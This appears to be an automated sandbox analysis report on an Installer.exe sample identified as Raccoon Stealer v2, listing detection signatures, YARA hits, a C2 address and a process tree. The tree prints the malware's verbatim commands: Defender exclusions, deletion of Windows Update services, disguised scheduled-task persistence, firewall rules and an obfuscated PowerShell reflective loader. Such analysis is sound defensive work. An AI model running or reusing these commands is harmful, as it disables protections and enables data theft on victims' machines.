Edit tour

Windows Analysis Report
Installer.exe

Overview

General Information

Sample Name:	Installer.exe
Analysis ID:	777905
MD5:	2522d780342912e8445b24a2591ecc8f
SHA1:	3f9d68666e83e4ac614ef5377c2bf9ac25d3c1da
SHA256:	cba2a99e147d807ab2d61744de51dbc8b8205d09f1ca9b2dd472d1953b274c11
Tags:	exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Stop multiple services

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Uses netsh to modify the Windows network and firewall settings

Query firmware table information (likely to detect VMs)

Uses cmd line tools excessively to alter registry or file data

Encrypted powershell cmdline option found

Machine Learning detection for sample

Allocates memory in foreign processes

Creates files in the system32 config directory

Injects a PE file into a foreign processes

Tries to evade analysis by execution special instruction (VM detection)

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses powercfg.exe to modify the power settings

Hides threads from debuggers

Sample uses process hollowing technique

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found hidden mapped module (file has been removed from disk)

Obfuscated command line found

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Modifies the windows firewall

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Creates job files (autostart)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

PE file contains an invalid checksum

Classification

Process Tree

System is w10x64

Installer.exe (PID: 2980 cmdline: C:\Users\user\Desktop\Installer.exe MD5: 2522D780342912E8445B24A2591ECC8F)

1u8JL0XE.exe (PID: 3064 cmdline: "C:\Users\user\AppData\LocalLow\1u8JL0XE.exe" MD5: 9253ED091D81E076A3037E12AF3DC871)

powershell.exe (PID: 2708 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1784 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 4808 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 1504 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 4660 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 1228 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5288 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

reg.exe (PID: 2420 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 1500 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 1244 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5860 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 1504 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 3292 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 1888 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 2556 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 4312 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 788 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 4716 cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 3692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dialer.exe (PID: 3376 cmdline: C:\Windows\system32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)

powershell.exe (PID: 1716 cmdline: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 1172 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

OBH7JYJN.exe (PID: 5136 cmdline: "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" MD5: AAEAD1169523638D40CA4D884E3D787A)

powershell.exe (PID: 4920 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 1636 cmdline: powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 60 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6136 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 64 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GoogleUpdate.exe (PID: 5852 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

netsh.exe (PID: 4532 cmdline: netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 2168 cmdline: netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 3628 cmdline: netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

NtjHIfvQ.exe (PID: 2424 cmdline: "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" MD5: 68E3359674EE7D49550B09E7FF69DCCE)

cmd.exe (PID: 5340 cmdline: "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5176 cmdline: schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

audiodg.exe (PID: 5340 cmdline: C:\Windows\system32\AUDIODG.EXE 0x424 MD5: 0B245353F92DF527AA7613BA2C0DA023)

MfU3390p.exe (PID: 3332 cmdline: "C:\Users\user\AppData\LocalLow\MfU3390p.exe" MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 5212 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

OBH7JYJN.exe (PID: 5856 cmdline: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe MD5: AAEAD1169523638D40CA4D884E3D787A)

OBH7JYJN.exe (PID: 5996 cmdline: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe MD5: AAEAD1169523638D40CA4D884E3D787A)

MfU3390p.exe (PID: 5144 cmdline: C:\Users\user\AppData\LocalLow\MfU3390p.exe MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 4688 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

NtjHIfvQ.exe (PID: 4744 cmdline: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe MD5: 68E3359674EE7D49550B09E7FF69DCCE)

cmd.exe (PID: 6124 cmdline: "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 1788 cmdline: schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

powershell.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 2748 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dllhost.exe (PID: 4128 cmdline: C:\Windows\System32\dllhost.exe /Processid:{946476e5-3894-42c2-b536-7341f926cc1f} MD5: 2528137C6745C4EADD87817A1909677E)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://109.107.173.210/"], "Bot ID": "e73f27cb584c5e7186bc777bf0481f2f", "RC4_key1": "e73f27cb584c5e7186bc777bf0481f2f"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\LocalLow\MfU3390p.exe	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute

Memory Dumps

Source	Rule	Description	Author	Strings
00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.344306639.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.333348862.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.337025443.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.361416689.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.342598570.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000002.465250354.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.343308304.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x21987:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.339209426.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.340250464.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.345979893.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.338031072.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.338723877.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.339040601.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.342801779.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.360447760.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.341764922.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.340857306.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.345866968.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.336335986.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.333379170.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.335268908.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
70.2.dllhost.exe.23bed1b0000.3.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
70.2.dllhost.exe.140000000.0.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
42.0.MfU3390p.exe.f20000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
69.2.audiodg.exe.1e0e69f0000.0.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
38.2.NtjHIfvQ.exe.fe0000.1.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
4.2.OBH7JYJN.exe.1d65bd0.1.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x13ec5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x141d5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x144b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x147a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14a91:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14d95:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15081:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15379:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15679:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15961:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15c49:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 